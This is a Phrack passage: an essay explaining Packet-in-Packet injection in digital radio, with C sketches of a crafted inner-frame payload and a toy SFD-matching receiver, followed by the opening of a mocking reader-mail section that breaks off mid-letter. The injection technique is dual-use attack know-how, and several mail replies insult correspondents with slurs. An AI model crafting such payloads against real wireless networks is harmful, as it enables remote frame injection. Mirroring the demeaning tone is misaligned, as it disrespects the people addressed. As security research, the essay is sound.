When one lays claim to generalizing a class of common misconceptions,
|
|
it is fitting to start with one's own. These are the things I used to
|
|
believe about digital radio -- or, more precisely, would not have
|
|
questioned if explicitly presented with them.
|
|
|
|
=== Wishful thinking ===
|
|
|
|
The following statements are obviously related and mutually
|
|
reinforcing:
|
|
|
|
1. Layer 1 delivers to Layer 2 either fully intact frames
|
|
exactly as transmitted by a peer in their entirety, or slightly
|
|
corrupted versions of such frames if CRC checking in Layer 1 is
|
|
disabled, as it sometimes is for sniffing.
|
|
|
|
2. In order to be received at Layer 1, a frame must be transmitted
|
|
with proper encapsulation by a compatible Layer 1 transmitter using
|
|
the exact same PHY protocol. There is no substitution in commodity
|
|
PHY implementations for the radio chip circuitry activated when the
|
|
chip starts transmitting a queued Layer 2 frame, except by use of
|
|
an expensive software defined radio.
|
|
|
|
3. Layer 1 implementations have means to unambiguously distinguish
|
|
between the radio transmission that precedes a frame -- such as the
|
|
frame's preamble -- and the frame's actual data. One cannot be
|
|
mistaken for the other, or such a mistake would be extremely rare and
|
|
barely reproducible.
|
|
|
|
4. Should a receiver miss the physical beginning of a frame
|
|
transmission on the air due to noise or a timing problem, the rest
|
|
of the transmission is wasted, and no valid frame could be received
|
|
at least until this frame's transmission is over.
|
|
|
|
For Layer 1 injection, this would imply the following limitations:
|
|
|
|
a. In order to successfully "inject" a crafted Layer 1 frame (that is,
|
|
to have it received by the target) the attacker needs to (1) build
|
|
the binary representation of the full frame in a buffer, (2)
|
|
possess a radio capable of transmitting buffer binary contents, and
|
|
(3) instruct the radio to transmit the buffer, possibly bypassing
|
|
hardware or firmware implementations of protocol features that may
|
|
alter or side-effect the transmission.
|
|
|
|
b. In particular, the injecting radio must perfectly cooperate by
|
|
producing the proper encapsulating physical signals for the
|
|
preamble, etc., around the injected buffer-held frame. Without such
|
|
cooperation, injection is not possible.
|
|
|
|
c. Errors due to radio noise can only break injection. The injecting
|
|
transmission, as a rule, needs to be more powerful to avoid being
|
|
thwarted by ambient noise.
|
|
|
|
d. Faraday cages are the ultimate protection against injection, as
|
|
long as the nodes therein maintain their software and hardware
|
|
integrity, and do not afford any undue privileges to the attacker.
|
|
|
|
A high-level summary of these beliefs could be stated like
|
|
this: the OSI Layer 1/Layer 2 boundary in digital radio is a _validity
|
|
and authenticity filter_ for frames. In order to be received, a frame
|
|
must be transmitted in its entirety via an "authentic" mechanism, the
|
|
transmitting chip's logic going through its normal or nearly normal
|
|
state transitions, or emulated by a software-defined radio.
|
|
|
|
Each and every one of these is _false_, as demonstrated by the
|
|
existence of Packet-in-Packet (PIP) [1,2] exploits.
|
|
|
|
=== A Packet Breaks Out ===
|
|
|
|
On a cold and windy February 23rd of 2011, my illusions came to an
|
|
abrupt end when I saw the payload bytes of an 802.15.4 frame's data
|
|
--- transmitted inside a valid packet as a regular payload ---
|
|
received as a frame of its own, reproducibly.
|
|
|
|
The "inner" packet, which I believed to be safely contained within the
|
|
belly of the enclosing frame, would occasionally break out and arrive
|
|
all by itself, without any sign of the encapsulating packet.
|
|
|
|
Every once in a while, there was no whale, just Jonah. It was a very
|
|
unwelcome miracle for someone who believed he could be safe from even
|
|
SDR-wielding attackers inside a cozy Faraday cage, as long as his
|
|
utopian gated community had no compromised nodes.
|
|
|
|
Where was my encapsulation now? Where was my textbook's OSI model?
|
|
|
|
Lies, all lies. Sweet illusions shattered by cruel Packet-in-Packet,
|
|
the textbook illusion of neat encapsulation chief among them. How the
|
|
books lied.
|
|
|
|
=== Packet-in-Packet: a miracle explained ===
|
|
|
|
The following is a typical structure of a digital radio frame
|
|
as seen by the radio:
|
|
|
|
------+----------+-----+-------------------------------+-----+------
|
|
noise | preamble | SFD | L2 frame reported by sniffers | CRC | noise
|
|
------+----------+-----+-------------------------------+-----+------
|
|
|
|
The receiving radio uses the preamble bytes to synchronize itself, at
|
|
the same time looking for SFD bytes digitally. Once a sequence of SFD
|
|
bytes matches, the radio starts treating further incoming bytes as the
|
|
content of the frame, saving them and feeding them into its checksum
|
|
computation.
|
|
|
|
Consider the situation when the "L2 payload bytes" transmitted after
|
|
the SFD themselves contain the following, say, as a valid payload of
|
|
a higher layer protocol:
|
|
|
|
---------+-----+--------------------+--------------------------------
|
|
preamble | SFD | inner packet bytes | valid checksum for inner packet
|
|
---------+-----+--------------------+--------------------------------
|
|
|
|
If the original frame's preamble and SFD are intact, all of the above
|
|
will be received and passed on to the driver and the OS as regular
|
|
payload bytes as intended.
|
|
|
|
Imagine, however, that the original SFD is damaged by noise and missed
|
|
by the radio. Then the initial bytes of the outer frame will be
|
|
interpreted as noise, leading up to the embedded "preamble" and "SFD"
|
|
of the would-be payload. These embedded preamble and SFD will instead be
taken to indicate the actual start of a real frame, and the "inner"
packet will be heard, up to and including the valid checksum. The following
|
|
bytes of the enclosing frame will again be dismissed as noise, until
|
|
another sequence of "preamble + SFD" is encountered.
|
|
|
|
Thus, due to noise damaging the real SFD and the receiver's inability
|
|
to tell noise bytes from payload bytes except by matching for an SFD,
|
|
the radio will occasionally receive the inner packet -- precisely as
|
|
if it were sent alone, deliberately.
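
To make the layout concrete, here is a minimal sketch of what such a
crafted higher-layer payload can look like. Every constant in it is a
placeholder -- real preamble/SFD values, frame contents and the FCS
algorithm all differ per PHY and per protocol -- the only point being
that bytes the attacker controls _as payload_ can spell out a complete
frame of their own:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/* pip_payload.c -- sketch of a Packet-in-Packet payload (placeholder
 * constants, toy checksum). The attacker never touches a radio: this
 * buffer travels to the victim network as ordinary application data. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* stand-in for the PHY's real FCS; substitute the protocol's CRC here */
static uint16_t toy_fcs(const uint8_t *p, size_t n)
{
    uint16_t fcs = 0;
    while (n--)
        fcs = (uint16_t)((fcs << 3) ^ (fcs >> 13) ^ *p++);
    return fcs;
}

int main(void)
{
    const uint8_t preamble[] = { 0x00, 0x00, 0x00, 0x00 }; /* placeholder */
    const uint8_t sfd[]      = { 0xA7 };                   /* placeholder */
    const uint8_t inner[]    = "crafted L2 header + crafted payload";

    uint8_t  payload[256];
    size_t   off = 0;
    uint16_t fcs = toy_fcs(inner, sizeof(inner) - 1);

    memcpy(payload + off, preamble, sizeof(preamble));
    off += sizeof(preamble);
    memcpy(payload + off, sfd, sizeof(sfd));
    off += sizeof(sfd);
    memcpy(payload + off, inner, sizeof(inner) - 1);
    off += sizeof(inner) - 1;
    payload[off++] = (uint8_t)(fcs & 0xff);   /* inner frame's checksum */
    payload[off++] = (uint8_t)(fcs >> 8);

    printf("%zu payload bytes: lose the outer SFD to noise and the radio\n"
           "re-syncs on the embedded one, delivering the inner frame\n",
           off);
    return 0;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++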
|
|
|
|
Thus a remote attacker capable of controlling the higher level
|
|
protocol payloads that get transmitted over the air by one of the
|
|
targeted radios on the targeted wireless network is essentially
|
|
capable of occasionally injecting crafted Layer 1 frames -- without
|
|
ever owning any radio or being near the targeted radios' physical
|
|
location.
|
|
|
|
Yes, Mallory, there is such a thing as Layer 1 wireless injection
|
|
without a radio. No, Mallory, a mean, nasty Faraday cage will not
|
|
spoil your holiday.
|
|
|
|
=== The reality ===
|
|
|
|
Designers of Layer 2 and above trust Layer 1 to provide valid or
|
|
"authentic" objects (frames) across the layer boundary. This trust is
|
|
misplaced.
|
|
|
|
There are two factors that likely contribute to this misplaced trust
among network engineers and researchers who are not familiar with radio
Layer 1 implementations but have read driver code and the code of the
layers above.
|
|
|
|
Firstly, the use of CRC-based checking throughout the OSI model
layers likely reinforces the faith in the ability of Layer 1 to detect
|
|
errors -- any symbol errors that accidentally corrupt the encapsulated
|
|
packet's structure while on the wire.
|
|
|
|
Secondly, the rather complex parsing code required for Layer 2 and
|
|
above to properly de-encapsulate respective payloads may lead its
|
|
readers to believe that similarly complex algorithms take place in
|
|
hardware or firmware in Layer 1.
|
|
|
|
However, L1 implementations are not validity, authenticity, or security
filters, nor do they maintain complex enough state or context about the
frame bytes they are receiving.
|
|
|
|
Aside from analog clock synchronization, their anatomy is nothing more
|
|
than that of a finite automaton that pulls bytes (more precisely,
|
|
symbols of the code that encodes the transmitted bytes, which differ
|
|
per protocol, both in bits/symbol and in modulation) out of the air,
|
|
continually.
|
|
|
|
The inherently noisy RF medium produces a constant stream of symbols.
|
|
The probability of hearing different symbols is actually non-uniform
|
|
and depends on the details of modulation and encoding scheme, such as
|
|
its error-correction.
|
|
|
|
As it receives the symbol stream, this automaton continually compares
|
|
a narrow window within the stream against the SFD sequence known to
|
|
start a frame. Once matched by this shift register, the symbols start
|
|
being accumulated in a buffer that will eventually be checksummed and
|
|
passed to the Layer 2 drivers.
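
A toy model of that receive path -- with made-up constants: a 16-bit
"SFD" of 0x00A7, one byte per symbol and a fixed toy frame length, where
real radios match symbols or nibbles and take the length from the frame
itself -- shows just how little context the automaton keeps:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/* rx_automaton.c -- toy model of a digital radio's receive path: a shift
 * register scanning a continuous symbol stream for an SFD, then buffering
 * a fixed-length "frame". All constants are made up for illustration. */
#include <stdio.h>
#include <stdint.h>

#define SFD      0x00A7   /* placeholder zero byte + sync byte */
#define FRAMELEN 16       /* toy fixed frame length            */

static void rx(const uint8_t *air, size_t n)
{
    uint16_t shift = 0;            /* the SFD-matching shift register */
    uint8_t  frame[FRAMELEN];
    size_t   got = 0;
    int      in_frame = 0;

    for (size_t i = 0; i < n; i++) {
        if (!in_frame) {
            shift = (uint16_t)((shift << 8) | air[i]);
            if (shift == SFD) {    /* match: start hoarding "payload" */
                in_frame = 1;
                got = 0;
            }
        } else {
            frame[got++] = air[i];
            if (got == FRAMELEN) { /* hand the buffer to "Layer 2"    */
                printf("  frame:");
                for (size_t k = 0; k < got; k++)
                    printf(" %02x", frame[k]);
                putchar('\n');
                in_frame = 0;
            }
        }
    }
}

int main(void)
{
    uint8_t air[] = {
        0x3c, 0x55,                      /* noise                     */
        0x00, 0xA7,                      /* outer SFD                 */
        'O','U','T','E','R',' ','H','D','R',' ',
        0x00, 0xA7,                      /* "SFD" inside the payload  */
        'i','n','n','e','r',' ','f','r','a','m','e','!','!','!','!','!',
        0x99, 0x99                       /* rest of the outer frame   */
    };

    puts("outer SFD intact:");
    rx(air, sizeof(air));

    air[3] ^= 0x01;   /* a single symbol error kills the outer SFD */
    puts("outer SFD damaged:");
    rx(air, sizeof(air));
    return 0;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Run against a stream whose outer SFD is intact, the embedded preamble/SFD
arrive as ordinary payload bytes; flip a single bit of the outer SFD and
the very same automaton locks onto the embedded one and hands the inner
frame to "Layer 2". That is the packet-in-packet effect of [1,2] in some
fifty lines of toy code.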
|
|
|
|
Beyond the start-of-frame matching automaton, the receiver has no other
context to determine whether symbols are in-frame payload or
out-of-frame noise. It has no other concept of encapsulation or frame
|
|
validity. A digital radio is just a machine for pulling bytes out of
|
|
the air. It has weird machines in that same way -- and for the same
|
|
reasons -- that a vulnerable C program has weird machines.
|
|
|
|
Encapsulation based on such a simple automaton is easily and frequently
broken in the presence of errors. All that is needed is for the chip's
idea of the start-of-frame sequence -- typically some of the preamble +
a Start of Frame Delimiter, a.k.a. Sync, or just the latter where the
preamble is used exclusively for analog synchronization -- to fail to
match; the subsequent payload bytes are then scanned as if they were
noise, until some of them are themselves mistaken for a start-of-frame
sequence.
|
|
|
|
In fact, to mislead the receiving automaton about the _intended meaning_
of symbols (or of the bytes they are supposed to make up or come from),
no crafted manipulation is necessary: the receiving machine is so simple
that _random noise_ alone provides all the "manipulation" needed to
confuse its state and allow for packet-in-packet injection.
|
|
|
|
Thus broken encapsulation enables injection for attackers without an
especially cooperative radio, or indeed without any radio at all -- so
long as the attacker can leverage some radio near the target into
producing a predictable stream of symbols.
|
|
|
|
=== What does this remind me of? ===
|
|
|
|
I remember the first time I witnessed a buffer overflow exploit, when
|
|
my Internet-facing Linux box, named Miskatonic, was exploited. Whoever
|
|
did that also opened a whole new world to me, and I'll be happy to
|
|
repay that debt with a beer should we ever meet in person.
|
|
|
|
At that time, I was a fairly competent C programmer, but I saw the
|
|
world in terms of functions that called other functions. Each of
|
|
these functions returned after being called to whichever address it
|
|
had been called from. I thought that the only way for a piece of code
|
|
to ever get executed was to be inside a function called at some point.
|
|
|
|
In other words, I regarded C functions as "atomic" abstractions. Even
|
|
though I implemented simple recursion and mutually recursive functions
|
|
via my own stacks a few times, it never occurred to me that a real
|
|
call stack could be anything other than a neat and perfect data
|
|
structure with "push", "pop", and referencing of variable slots.
|
|
|
|
Beware layers of abstractions. Take their expected, specified
|
|
operation on faith, and they will appear real. It is tempting to trust
|
|
a lower abstraction layer to provide _only_ the valid data structures
|
|
your next layer expects to receive, to assume that the lower layer's
|
|
designers already took responsibility for it. It is so tempting to
|
|
limit your considerations to the detail and complexity of the layer
|
|
you are working in.
|
|
|
|
Thus the layers of abstraction become boundaries of competence.
|
|
|
|
This temptation is overpowering in well-designed, abstraction-oriented
|
|
environments, where you lack any legal or effective means of PEEK-ing
|
|
or POKE-ing the underlying layers. Dijkstra decried BASIC as a
|
|
mind-mutilating language, but most real BASICs had PEEK and POKE to
|
|
explore the actual RAM, and one sooner or later found himself
|
|
wondering what they did. I wonder what Dijkstra would have said about
|
|
Java, which entirely traps the mind of a programmer in its
|
|
abstractions, with no hint of any other ways or idioms of programming.
|
|
|
|
|
|
=== How we could have avoided falling for it ===
|
|
|
|
The key to understanding this design problem is the set of incorrect
assumptions about how input is handled -- in particular, about how it is
handled as a language, and about the machine that handles it.
|
|
|
|
The _language-theoretic approach_ to finding just such misconceptions
|
|
and the exploitable bugs based on them was developed by Len Sassaman
|
|
and Meredith L. Patterson. Watch their talks [3,4] and look for
|
|
upcoming papers at http://langsec.org
|
|
|
|
Such a language-theoretic analysis at L1 would have revealed this
|
|
immediately. Valid frames are phrases in the language of bytes that a
|
|
digital radio continually pulls out of the air, and the L1 seen as an
|
|
automaton for accepting valid phrases (frames) should reject
|
|
everything else.
|
|
|
|
The start-of-frame-delimiter matching functionality within the radio
|
|
chip is just a shift register and a comparison circuit -- too simple
|
|
an automaton, in fact, to guarantee anything about the validity of the
|
|
frame. With this perspective, the misconception of L2 expecting frame
|
|
encapsulation and validity becomes clear, almost trivial. The key to
|
|
finding the vulnerability is in choosing this perspective.
|
|
|
|
Conversely, there is no nicer source of 0-day than false assumptions
|
|
about what is on the other side of an interface boundary of a
|
|
textbook-blessed design. The convenient fiction of classic
|
|
abstractions leads one to imagine a perfect and perfectly trustworthy
|
|
machine on the other side, which takes care of serving up only the
|
|
right kind of inputs to one's own layer. And so layers of abstraction
|
|
become boundaries of competence.
|
|
|
|
References:
|
|
|
|
[1] Travis Goodspeed, Sergey Bratus, Ricky Melgares, Rebecca Shapiro,
|
|
Ryan Speers,
|
|
"Packets in Packets: Orson Welles' In-Band Signaling Attacks for
|
|
Modern Radios",
|
|
USENIX WOOT, August 2011,
|
|
http://www.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf
|
|
|
|
[2] Travis Goodspeed,
|
|
Remotely Exploiting the PHY Layer,
|
|
http://travisgoodspeed.blogspot.com/2011/09/
|
|
remotely-exploiting-phy-layer.html
|
|
|
|
[3] Len Sassaman, Meredith L. Patterson,
|
|
"Exploiting the Forest with Trees",
|
|
BlackHat USA, August 2010,
|
|
http://www.youtube.com/watch?v=2qXmPTQ7HFM
|
|
|
|
[4] Len Sassaman, Meredith L. Patterson,
|
|
"Towards a formal theory of computer insecurity: a language-theoretic
|
|
approach"
|
|
Invited Lecture at Dartmouth College, March 2011,
|
|
http://www.youtube.com/watch?v=AqZNebWoqnc
|
|
|
|
|
|
|=[ EOF ]=---------------------------------------------------------------=|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x05 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ L O O P B A C K ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Phrack Staff ]=--------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
Hi there!
|
|
|
|
The least we could say is that p67 caught the attention of a lot of people.
|
|
We got very good feedback IRL, on IRC and through the comments on
|
|
the website. Good. As you will soon find out, we had quite a bunch of
|
|
(un)interesting mails this year which we would like to share obviously ;>
|
|
Before going further, a quote from the last loopback is necessary:
|
|
|
|
---
|
|
We humbly apologize to all guys we never answered to neither by mail nor
|
|
through this phile because we suck at filtering our spam (this could
|
|
_absolutely_ not be a laziness issue, right?)
|
|
---
|
|
|
|
That said, we have to thank all the people that (un)voluntarily sent their
|
|
contributions, whatever these were.
|
|
|
|
As you will see, a polemic started with the release of the last scene phile
|
|
as several people felt a bit disappointed (to say the least) by the
|
|
description of the gr33k scene.
|
|
|
|
So let's explain a few things about the context of its writing:
|
|
- The writing itself is short and somewhat one-sided because the authors
  didn't have the time to do better.
|
|
- We (the phrack staff) are the ones who asked them for such a phile
|
|
and being in a hurry we couldn't give more than a couple of weeks to
|
|
the authors. Clearly they *SAVED* our sorry ass and they did it for
|
|
you, the community. Sincere apologies from the staff if this was not good
|
|
enough.
|
|
- (Greek) people may argue that the description was not accurate itself
|
|
but as you can remember, it was written with the idea of being
|
|
completed in this release:
|
|
|
|
|
|
Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10
|
|
---
|
|
In this brief article we will attempt to give an overview of the current
|
|
state of the Greek computer underground scene. However, since the strictly
|
|
underground scene in Greece is very small, we will also include some
|
|
information about other active IT security related groups and forums. There
|
|
is a going to be a second part to this article at a future issue in which
|
|
we will present in detail the past of the underground Greek scene in all
|
|
its gory glory. ---
|
|
|
|
And they kept their promise with the help of some notorious big shots
|
|
of the greek hacking scene.
|
|
|
|
To the bunch of losers/masturbating monkeys who are still complaining:
|
|
|
|
/"\
|
|
|\./|
|
|
| |
|
|
| |
|
|
|>~<|
|
|
| |
|
|
/'\| |/'\..
|
|
/~\| | | | \
|
|
| =[@]= | | \
|
|
| | | | | \
|
|
| ~ ~ ~ ~ |` )
|
|
| /
|
|
\ /
|
|
\ /
|
|
\ _____ /
|
|
|--//''`\--|
|
|
| (( +==)) |
|
|
|--\_|_//--|
|
|
|
|
|
|
Don't worry, we published your side of the story as well. And now it's time
|
|
for our little ... hem ... group therapy session ;-)
|
|
|
|
|
|
-- The Phrack Staff
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x00 - Phrack .VS. the social networks ]=--------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
From: Unix Root <1161967623738704101@mail.orkut.com>
|
|
Subject: orkut - Unix Root wants you to join orkut!
|
|
|
|
Unix Root wants you to join orkut.
|
|
|
|
[ Unix Root himself, seriously? ]
|
|
|
|
Join now!
|
|
http://www.orkut.co.in/Join.aspx?id=ZZZZZZZZZZZZZZ&mt=22
|
|
|
|
[ id has been replaced to protect the innocent (us) ]
|
|
|
|
|
|
* * *
|
|
|
|
What you can do on orkut:
|
|
- CONNECT with friends and family using scraps and instant messaging
|
|
- DISCOVER new people through friends of friends and communities
|
|
- SHARE your videos, pictures, and passions all in one place
|
|
|
|
[ Sounds like it would change my life. ]
|
|
|
|
Help Center: http://help.orkut.com/support/
|
|
|
|
[ To tell you the truth, help won't be necessary at this point :> ]
|
|
|
|
---
|
|
|
|
From: ***** ***** <thehackernews@gmail.com>
|
|
Subject: Invitation to connect on LinkedIn
|
|
|
|
LinkedIn
|
|
------------
|
|
|
|
|
|
I'd like to add you to my professional network on LinkedIn.
|
|
|
|
- *****
|
|
|
|
[ What if we do not intend to do business with you? ]
|
|
|
|
**** ****
|
|
Owner at The Hacker News
|
|
New Delhi Area, India
|
|
|
|
Confirm that you know **** *****
|
|
https://www.linkedin.com/e/xxxxxx-wwwwwwww-2h/isd/YYYYYYYYYYY/PPP_OOO/
|
|
|
|
--
|
|
(c) 2011, LinkedIn Corporation
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x01 - <?php include($teaMp0isoN) ?> ]=----------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Poison Blog <p0isonblog@ymail.com>
|
|
Subject: TeaMp0isoN: Issue 1
|
|
|
|
My first ever zine, read it and let me know what you think. hoping it gets
|
|
published in the next phrack magazine.
|
|
|
|
[ Hem. So basically this is a new concept: publishing a zine inside
|
|
another zine. And we even got 0day-hashes in the process. WIN/WIN ]
|
|
|
|
- TriCk
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x02 - The usual mails ]=-----------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
[ Have you ever been curious about the kind of mail we are used to
|
|
receive? Let's have a taste. ]
|
|
|
|
---
|
|
|
|
From: skywalker <oyyj07@gmail.com>
|
|
Subject: how can I get the source code
|
|
|
|
hello, I found some source code in phrack Magazine, but it is attach with
|
|
text mode, how can I get it?
|
|
|
|
[ Download the paper in "text mode". Then comment everything inside
|
|
that is not the code you want to compile and fire gcc.
|
|
It might work. If it doesn't, mail nikoletaki_87@yahoo.gr for help. ]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: Phrack issue 58
|
|
|
|
How can i get the binary-encryption.tar.gz
|
|
from the article Runtime binary encryption?
|
|
|
|
[ You can't; it's encrypted. I think oyyj07@gmail.com has the password.
|
|
You should get in touch with him. ]
|
|
|
|
---
|
|
|
|
From: stephane.camprasse@free.fr
|
|
Subject: edition 64 infected by OSX:Niqtana
|
|
|
|
Hello there,
|
|
|
|
tar.gz of the magazine number 64 appears to be infected:
|
|
|
|
http://www.sophos.com/en-us/threat-center/threat-analyses/
|
|
viruses-and-spyware/OSX~Niqtana-A/detailed-analysis.aspx
|
|
|
|
[ Wow. Sounds like a serious issue. What should we do? ]
|
|
|
|
Kind Regards
|
|
|
|
Stephane Camprasse, CISSP
|
|
|
|
[ At first we wanted to laugh, then we saw you are serious business. ]
|
|
|
|
---
|
|
|
|
From: Domenico ****** <jmimmo82@gmail.com>
|
|
Subject: Mailing Lists Phrack
|
|
|
|
Dear Phrack Staff
|
|
|
|
I would like to subscribe at mailing lists of Phrack but email
|
|
addresses provided by the site not exist.
|
|
|
|
[ That's because there is no ML, dude. ]
|
|
|
|
What do you advise me?
|
|
|
|
[ Well, keep looking. ]
|
|
|
|
Best Regards
|
|
Domenico *******
|
|
|
|
---
|
|
|
|
From: Robert Simmons <rsimmons0@gmail.com>
|
|
Subject: phrack via email
|
|
|
|
Do you have a mailing list that sends phrack out via email, or at least an
|
|
email reminder to go download it?
|
|
|
|
[ We don't. What would be the point in a bloggo/twitto world where
|
|
information spreads that fast? ]
|
|
|
|
Rob
|
|
|
|
---
|
|
|
|
From: Elias <thesaltysalmon@gmx.com>
|
|
Subject: How do i subscribe?
|
|
|
|
As the title says, how do i subscribe to Phrack?
|
|
|
|
[ Since you're not polite we won't accept your subscription. Don't
|
|
mail us again. Please. ]
|
|
|
|
---
|
|
|
|
From: William Mathis <scotti@uniss.it>
|
|
Subject: One paper can change everything!
|
|
|
|
[ New submission???? :D ]
|
|
|
|
What do I mean? Of course the Diploma.
|
|
|
|
[ 0wned. Deception is part of the game :-/ ]
|
|
|
|
It is no secret that the knowledge, skills and experience play a crucial
|
|
role in getting the desired position, but despite the formality when
|
|
applying for a job essential requirement is a diploma! At the moment
|
|
receive a diploma is very expensive, takes time and power.
|
|
|
|
ORDER DIPLOMA RIGHT NOW AND RAISE THE PROFESSIONAL LEVEL, SKILLS AND
|
|
EXPERIENCE!
|
|
|
|
[ Can we send our order in via PDF? You have to open it with
|
|
Acroread 9.x though, since you're only worth an 0lday to us.
|
|
Thank you for playing "rm me harder" w/ phrackstaff! ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x03 - Desperate house wifes ]=-----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Luna Tix <lunatix@linuxmail.org>
|
|
Subject: A request regarding pdf files
|
|
|
|
[ Our resident Adobe consultant is currently on holidays. We do have our
|
|
.txt specialists however. ]
|
|
|
|
Hi,
|
|
|
|
I have downloaded some adobe 3d files from a website, and need them to be
|
|
converted into autodesk inventor ipt files.
|
|
|
|
[ You've knocked on the right door. ]
|
|
|
|
Can you teach me how to do this? If yes, I can send you some of the files
|
|
for trial, if you are successful, I am willing to pay for it.
|
|
|
|
[ Excellent! How much can you pay exactly? Our local liquor store no
|
|
longer accepts PDF conversion techniques in exchange for beer. ]
|
|
|
|
All the best.
|
|
|
|
Luna
|
|
|
|
---
|
|
|
|
From: sabrina <sabrina*******@gmail.com>
|
|
Subject: don't know where to go
|
|
|
|
|
|
hi,
|
|
i'm in need of someone to help me in a cyber cat burglar kind of way.
|
|
i've tried all the legal ways... police, fbi, fed trade commission all to
|
|
busy with terrorist.
|
|
|
|
[ Now that they've caught Osama, they should have some free time. Try
|
|
to contact them again. ]
|
|
|
|
i can go to a detective then civil lawyer but that would take way too mush
|
|
time and an exorbitant amount of money.
|
|
|
|
[ Clearly, you've mistaken us for the cheap option. ]
|
|
|
|
i need someone to find information
|
|
on exactly where someone is located. i have email address, cell phone and
|
|
bank account numbers ...
|
|
|
|
[ Do you have GPS coordinates? ]
|
|
|
|
I'm hoping to find or at least be lead to some one who is very creative in
|
|
using their computer. my only goal is to locate this person, i'm not out to
|
|
steal or do any harm.
|
|
|
|
[ I know some very creative people. They compose music on their
|
|
computer! For realz! Would that help you? ]
|
|
|
|
if you think you can help me i'll give you my phone number, i can then
|
|
better explain why this way for me would be the only way to go, i lost 20
|
|
years of my life's hard work, i just want to locate this person.
|
|
|
|
[ Wow, sorry for being so hard on you with the previous comments,
|
|
Sabrina. It is obvious to us now that you are clearly retarded.
|
|
Please leave a comment on the website with your phone number. We'll
|
|
get back to you. ]
|
|
|
|
thank you
|
|
sabrina
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x04 - Cooperation ]=---------------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Monika ****** <monika.******@software.com.pl>
|
|
Subject: cooperation
|
|
|
|
Dear Sir or Madam
|
|
|
|
[ It's professor actually. ]
|
|
|
|
My name is Monika *********. I represent Hakin 9'- IT Security magazine
|
|
(for more details, please see our website www.hakin9.org). I would be very
|
|
much interested in long term cooperation with your company.
|
|
|
|
[ Our company? :D ]
|
|
|
|
We would co-promote our services and spread the information on IT Security
|
|
together.
|
|
|
|
[ Well the problem is that we don't have that many services:
|
|
- 7-bit cleaning of ASCII papers, we are considered the market
|
|
leaders in this service
|
|
- Spam hunting with advanced regexp (i.e. matching ANTISPAM in the
|
|
subject)
|
|
- Mail storage, no backups though :(
|
|
- Technical review of papers when we understand them
|
|
See? That's not too much :-/
|
|
But thanks for the kind offer. PHRACK could totally use the promotion
|
|
of such a well established magazine as h8king (or whatever). ]
|
|
|
|
I am really looking forward to hearing from you.
|
|
|
|
[ Don't call us, we'll call you! ]
|
|
|
|
Best Regards,
|
|
|
|
Monika ********
|
|
|
|
Software Press
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x05 - Help is requested! (again) ]=-------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Kevin **** <********@att.net>
|
|
Subject: Help with Persistent BIOS Infection
|
|
|
|
Hope you can help. I have a small video business and from my son's school
|
|
flashdrive my network of computers are infected with Persistent BIOS
|
|
Infection. My hard drive's have been rearranged with FAT segments and i
|
|
believe is running my XP/Win7 OS's as a virtual machine.
|
|
|
|
[ Unfortunately Joanna is not part of the staff. But we have the
|
|
feeling that your analysis of the situation could be improved :> ]
|
|
|
|
This has caused my rendering performance to be ruduced by 50%. Also when i
|
|
make DVD's the infection is on the disc and from complants it infected
|
|
other machines. My software is legit and i don't download anything.
|
|
|
|
[ Of course. Who does anyway? Your son perhaps :> ]
|
|
|
|
I'm new (6yrs) to computers, i some what know what to do but not really.
|
|
|
|
[ So you know but you don't know. That's good, have the half of you
|
|
that knows guide the other half that doesn't. You can't go wrong. ]
|
|
|
|
I have killed my network and now keep all computers separate but know
|
